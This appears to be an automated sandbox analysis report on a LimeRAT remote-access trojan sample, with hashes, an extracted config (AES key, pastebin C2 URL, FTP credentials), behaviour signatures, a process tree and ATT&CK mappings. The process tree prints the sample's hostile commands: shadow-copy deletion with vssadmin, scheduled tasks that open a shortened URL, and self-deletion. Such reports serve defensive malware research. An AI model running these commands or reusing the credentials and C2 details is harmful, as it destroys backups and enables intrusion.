Analysis
-
max time kernel
1799s -
max time network
1803s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
-
submitted
26-04-2024 19:22
General
-
Target
Client.exe
-
Size
252KB
-
MD5
7746b64cfda991754c277e8dbfcb12bf
-
SHA1
f3d05a15cf7c4f1d07bca938076cb53df9c39e16
-
SHA256
ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
-
SHA512
04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
-
SSDEEP
6144:tEIE/UVPy/oCa+LDZWC9z589b2vknq1dis4N:iIzPygCa+DZQnq1cP
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Extracted
limerat
False
-
aes_key
adminsigma5214881939pashalko
-
antivm
false
-
c2_url
https://pastebin.com/raw/DDTVwwbu
-
download_payload
false
-
install
true
-
install_name
MIcrosoft Teams.exe
-
main_folder
True
-
payload_url
True
-
pin_spread
true
-
sub_folder
False
-
usb_spread
true
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
-
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "20:17" /sc daily /mo "3" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "18:29" /sc daily /mo "5" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "09:53" /sc daily /mo "1" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "13:02" /sc weekly /mo "3" /d "Sun" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "05:01" /sc monthly /m "may" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"2⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
-
C:\Windows\system32\PING.EXEping 0 -n 23⤵
- Runs ping.exe
-
C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
252KB
MD57746b64cfda991754c277e8dbfcb12bf
SHA1f3d05a15cf7c4f1d07bca938076cb53df9c39e16
SHA256ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
SHA51204b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
272KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB